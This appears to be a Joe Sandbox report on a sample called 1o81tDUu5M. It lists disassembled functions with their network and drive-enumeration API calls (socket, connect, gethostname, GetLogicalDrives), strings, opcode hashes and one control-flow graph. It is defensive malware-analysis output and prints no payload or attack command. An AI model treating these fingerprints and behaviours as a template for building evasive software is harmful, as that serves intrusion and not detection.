                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1822214275.0000000006D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6d90000_1o81tDUu5M.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: "Q=R$A:\$A:\
                                                              • API String ID: 999431828-695790028
                                                              • Opcode ID: f70d6875813cfacd2f25c7b36762c0ed933cd3ecee8bd8a5b7873165861de9db
                                                              • Instruction ID: edbe35ea24cc0cbecbeb7abd0a1a3dbd80f43d4da6ad473354a244f65afb4d15
                                                              • Opcode Fuzzy Hash: f70d6875813cfacd2f25c7b36762c0ed933cd3ecee8bd8a5b7873165861de9db
                                                              • Instruction Fuzzy Hash: AA5170EB148121BD7BC281953B54AFA6A7EE7DB630330842EF487D1902E2D48F4965B1
                                                              Function 009375E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 66networkCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1572 9375e0-9375ed 1573 937607-937629 socket 1572->1573 1574 9375ef-9375f6 1572->1574 1576 93762b-93763c call 9372a0 1573->1576 1577 93763f-937642 1573->1577 1574->1573 1575 9375f8-9375ff 1574->1575 1578 937643-937699 call 9372a0 call 93cb20 call cb8c50 1575->1578 1579 937601-937602 1575->1579 1576->1577 1579->1573
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1819574715.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                              • Associated: 00000000.00000002.1819556702.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1819574715.0000000000DE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1819574715.0000000000F43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1819574715.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820016300.0000000000F48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.0000000000F4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000010D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000011E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000012BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000012C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000012D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820338791.00000000012D6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820460651.000000000148D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820479825.000000000148F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_930000_1o81tDUu5M.jbxd
                                                              Similarity
                                                              • API ID: socket
                                                              • String ID: FD %s:%d socket() = %d$LIMIT %s:%d %s reached memlimit$socket
                                                              • API String ID: 98920635-842387772
                                                              • Opcode ID: bb96381d93d0b0687a7d939201b68fb6173dda529d6e4f4b0e7351403148efba
                                                              • Instruction ID: 4de27b37a226854d1ac64b339ba84f53b24cacb143a89e702990a41a7c4b6612
                                                              • Opcode Fuzzy Hash: bb96381d93d0b0687a7d939201b68fb6173dda529d6e4f4b0e7351403148efba
                                                              • Instruction Fuzzy Hash: 2A11CCF1A14241ABD6302B6D6C17F9B7F8CCFC1734F040810F404A22D2D2128C58C6E2
                                                              Function 06D90398 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 295COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE ref: 06D9049E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1822214275.0000000006D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6d90000_1o81tDUu5M.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: "Q=R$A:\
                                                              • API String ID: 999431828-3097021601
                                                              • Opcode ID: fcd616567f0e45661da864c90d5c6a83e57ef1c45fbaa9040fb1797a26cbc7fb
                                                              • Instruction ID: 4c48680ed41c7f463dc3ba701f088c745c32c2b4051354c9f5a94dbcae5f0847
                                                              • Opcode Fuzzy Hash: fcd616567f0e45661da864c90d5c6a83e57ef1c45fbaa9040fb1797a26cbc7fb
                                                              • Instruction Fuzzy Hash: E65180EB148121BD7BC281953B54AFA6B7EE7DB730330843AF487D5902E2C88F4965B1
                                                              Function 06D903CB Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE ref: 06D9049E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1822214275.0000000006D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6d90000_1o81tDUu5M.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: "Q=R$A:\
                                                              • API String ID: 999431828-3097021601
                                                              • Opcode ID: 09495c1469079281d2146df8b7c7f7708f5b29546cbc4dbda4b170152b06b74f
                                                              • Instruction ID: 5ec03b31d27d7e6d56895f6271f213f9c4048c59bb2f2d592768a9d85ebdd269
                                                              • Opcode Fuzzy Hash: 09495c1469079281d2146df8b7c7f7708f5b29546cbc4dbda4b170152b06b74f
                                                              • Instruction Fuzzy Hash: 1451C3EB54C110BEBBC281957B54AFA6B7DE7DB330330846EF887D6502E2848E4995B1
                                                              Function 06D903FB Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 269COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE ref: 06D9049E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1822214275.0000000006D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6d90000_1o81tDUu5M.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: "Q=R$A:\
                                                              • API String ID: 999431828-3097021601
                                                              • Opcode ID: 5ec9b3d341a6b5fb0fef739953f250a33282555f93fd125516b304b8f37b16f3
                                                              • Instruction ID: c60c936530614160e81b408066f0d6cc96f881a02819c0216b8e82d66e1ae6a6
                                                              • Opcode Fuzzy Hash: 5ec9b3d341a6b5fb0fef739953f250a33282555f93fd125516b304b8f37b16f3
                                                              • Instruction Fuzzy Hash: 8A5180DB148121BD7BC281953B54AFA6A7EE7DB630330843EF487D5602E6C48F8965B1
                                                              Function 00CB8E90 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 125COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1819574715.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                              • Associated: 00000000.00000002.1819556702.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1819574715.0000000000DE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1819574715.0000000000F43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1819574715.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820016300.0000000000F48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.0000000000F4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000010D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000011E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000012BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000012C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000012D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820338791.00000000012D6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820460651.000000000148D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820479825.000000000148F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_930000_1o81tDUu5M.jbxd
                                                              Similarity
                                                              • API ID: _open
                                                              • String ID: terminated$@
                                                              • API String ID: 4183159743-3016906910
                                                              • Opcode ID: 3b42a1b10a6a48b0b2cbb91a98e952607ef0dedf538cd03a41cd5ab82c1bf221
                                                              • Instruction ID: beccba003d5267b8c8fb70a9a1a677928479ef21a916bc07302affc58b19d1ad
                                                              • Opcode Fuzzy Hash: 3b42a1b10a6a48b0b2cbb91a98e952607ef0dedf538cd03a41cd5ab82c1bf221
                                                              • Instruction Fuzzy Hash: A9416CB49043058FDB00EF79C8446AEBBF4EB48314F148A2DE8A8D7290E734D949DF66
                                                              Function 0096A150 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 80COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • getsockname.WS2_32(?,?,00000080), ref: 0096A1C6
                                                              Strings
                                                              • ssloc inet_ntop() failed with errno %d: %s, xrefs: 0096A23B
                                                              • getsockname() failed with errno %d: %s, xrefs: 0096A1F0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1819574715.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                              • Associated: 00000000.00000002.1819556702.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1819574715.0000000000DE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1819574715.0000000000F43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1819574715.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820016300.0000000000F48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.0000000000F4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000010D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000011E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000012BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000012C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000012D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820338791.00000000012D6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820460651.000000000148D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820479825.000000000148F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_930000_1o81tDUu5M.jbxd
                                                              Similarity
                                                              • API ID: getsockname
                                                              • String ID: getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s
                                                              • API String ID: 3358416759-2605427207
                                                              • Opcode ID: 49b3714cf0e496e1c9f7edd2804d38bec550560b0d0e95d4352269df7eb95d39
                                                              • Instruction ID: 4bba6eb318b7800a1b44df567280e106c5527f24ce9cf2283494925e7b3d7e46
                                                              • Opcode Fuzzy Hash: 49b3714cf0e496e1c9f7edd2804d38bec550560b0d0e95d4352269df7eb95d39
                                                              • Instruction Fuzzy Hash: E9210C31948284AAF7229B18EC42FE773BCEFD1328F004654F99863151FB3259858BE2
                                                              Function 0094D5E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46networkCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • WSAStartup.WS2_32(00000202), ref: 0094D65B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1819574715.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                              • Associated: 00000000.00000002.1819556702.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1819574715.0000000000DE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1819574715.0000000000F43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1819574715.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820016300.0000000000F48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.0000000000F4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000010D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000011E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000012BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000012C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000012D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820338791.00000000012D6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820460651.000000000148D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820479825.000000000148F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_930000_1o81tDUu5M.jbxd
                                                              Similarity
                                                              • API ID: Startup
                                                              • String ID: if_nametoindex$iphlpapi.dll
                                                              • API String ID: 724789610-3097795196
                                                              • Opcode ID: 793fba37587cbc65445533e71ab5f4c0486c1ac812daf200ca526485d76afe90
                                                              • Instruction ID: 1f5707ad9a71409424aed360c9f0e316d42b9c5b468070d9d1672324f3783e00
                                                              • Opcode Fuzzy Hash: 793fba37587cbc65445533e71ab5f4c0486c1ac812daf200ca526485d76afe90
                                                              • Instruction Fuzzy Hash: A501F7D4E4234107F7116B38AD1776A35949B91304F4A0478D988921D3F769CA4CC2B3
                                                              Function 009FAA30 Relevance: 4.9, APIs: 3, Instructions: 377networkCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • socket.WS2_32(FFFFFFFF,?,00000000), ref: 009FAB9B
                                                              • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 009FABE4
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1819574715.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                              • Associated: 00000000.00000002.1819556702.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1819574715.0000000000DE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1819574715.0000000000F43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1819574715.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820016300.0000000000F48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.0000000000F4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000010D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000011E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000012BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000012C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000012D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820338791.00000000012D6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820460651.000000000148D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820479825.000000000148F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_930000_1o81tDUu5M.jbxd
                                                              Similarity
                                                              • API ID: ioctlsocketsocket
                                                              • String ID:
                                                              • API String ID: 416004797-0
                                                              • Opcode ID: cf6596954874e75f7f133593eb9f33393af34b619ed901de9d39033f7c088578
                                                              • Instruction ID: 24d359dcb54a86f3eb2b71a0d47d075236b25139770e06a0d68ef4c4a5de708a
                                                              • Opcode Fuzzy Hash: cf6596954874e75f7f133593eb9f33393af34b619ed901de9d39033f7c088578
                                                              • Instruction Fuzzy Hash: 28E1BFB06043059BEB20CF24C884B7B77E9EF89314F144A2DFA9D9B291E775D944CB92
                                                              Function 009378B0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1819574715.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                              • Associated: 00000000.00000002.1819556702.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1819574715.0000000000DE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1819574715.0000000000F43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1819574715.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820016300.0000000000F48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.0000000000F4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000010D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000011E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000012BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000012C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000012D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820338791.00000000012D6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820460651.000000000148D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820479825.000000000148F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_930000_1o81tDUu5M.jbxd
                                                              Similarity
                                                              • API ID: closesocket
                                                              • String ID: FD %s:%d sclose(%d)
                                                              • API String ID: 2781271927-3116021458
                                                              • Opcode ID: ed85444c98a164b14fa7a9cdc323383cd58c6193d2e78a38108c4e0f6d2ac814
                                                              • Instruction ID: c415611eee94dca4c295f783f521ae092e5bb8b00e36f171960211c386d57d8f
                                                              • Opcode Fuzzy Hash: ed85444c98a164b14fa7a9cdc323383cd58c6193d2e78a38108c4e0f6d2ac814
                                                              • Instruction Fuzzy Hash: B0D05E72A192616B85306599AC48C4BBBA8DDC6FA0F050858F94077200E1219C0587F2
                                                              Function 009FB060 Relevance: 3.0, APIs: 2, Instructions: 48networkCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • connect.WS2_32(-00000028,-00000028,-00000028,-00000001,-00000028,?,-00000028,009FB29E,?,00000000,?,?), ref: 009FB0BA
                                                              • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,00000000,0000000B,?,?,009E3C41,00000000), ref: 009FB0C1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1819574715.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                              • Associated: 00000000.00000002.1819556702.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1819574715.0000000000DE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1819574715.0000000000F43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1819574715.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820016300.0000000000F48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.0000000000F4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000010D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000011E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000012BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000012C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000012D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820338791.00000000012D6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820460651.000000000148D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820479825.000000000148F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_930000_1o81tDUu5M.jbxd
                                                              Similarity
                                                              • API ID: ErrorLastconnect
                                                              • String ID:
                                                              • API String ID: 374722065-0
                                                              • Opcode ID: 50e383172e1923b0091d0da412c13a358632b12e7c49fffa58ffe65b11e3d211
                                                              • Instruction ID: e548407946144857ff430bf6bc997e81e1d635dddbd3187c58da9823d3d703cc
                                                              • Opcode Fuzzy Hash: 50e383172e1923b0091d0da412c13a358632b12e7c49fffa58ffe65b11e3d211
                                                              • Instruction Fuzzy Hash: 0201D8363042089BDA205E68C844F7BB399FF89364F180B54FA78931D5DB26ED509762
                                                              Function 009E4950 Relevance: 1.7, APIs: 1, Instructions: 170networkCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • gethostname.WS2_32(00000000,00000040), ref: 009E4AA5
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1819574715.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                              • Associated: 00000000.00000002.1819556702.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1819574715.0000000000DE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1819574715.0000000000F43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1819574715.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820016300.0000000000F48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.0000000000F4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000010D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000011E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000012BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000012C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000012D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820338791.00000000012D6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820460651.000000000148D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820479825.000000000148F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_930000_1o81tDUu5M.jbxd
                                                              Similarity
                                                              • API ID: gethostname
                                                              • String ID:
                                                              • API String ID: 144339138-0
                                                              • Opcode ID: 30201ad2dc9516db1139f0c02b557ce8e5cf6ad8c6489dace180caa9125c9c53
                                                              • Instruction ID: ce65d7b127e487a8d6efa0710a57202e7fe0c0b365ccf017f65692ba2785c2b1
                                                              • Opcode Fuzzy Hash: 30201ad2dc9516db1139f0c02b557ce8e5cf6ad8c6489dace180caa9125c9c53
                                                              • Instruction Fuzzy Hash: 475106706047809BE7329B27DD4972776DCEF84724F18083DE98A966D2E778EC44D706
                                                              Function 009FAF70 Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • getsockname.WS2_32(?,?,00000080), ref: 009FAFD0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1819574715.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                              • Associated: 00000000.00000002.1819556702.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1819574715.0000000000DE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1819574715.0000000000F43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1819574715.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820016300.0000000000F48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.0000000000F4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000010D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000011E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000012BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000012C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000012D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820338791.00000000012D6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820460651.000000000148D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820479825.000000000148F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_930000_1o81tDUu5M.jbxd
                                                              Similarity
                                                              • API ID: getsockname
                                                              • String ID:
                                                              • API String ID: 3358416759-0
                                                              • Opcode ID: 970bfac099db1ddab5a201f986c0205bb34e7d4e9e44ee9f77446b1d66dbc6a0
                                                              • Instruction ID: a076dd5dcd04be072253833278f78d502f2f8be7d7d12b8524b87f7632f87d7f
                                                              • Opcode Fuzzy Hash: 970bfac099db1ddab5a201f986c0205bb34e7d4e9e44ee9f77446b1d66dbc6a0
                                                              • Instruction Fuzzy Hash: DC11967080878496EB268F18D8027F6B3F8EFD0328F109A18E6D942150F7369AC58BC2
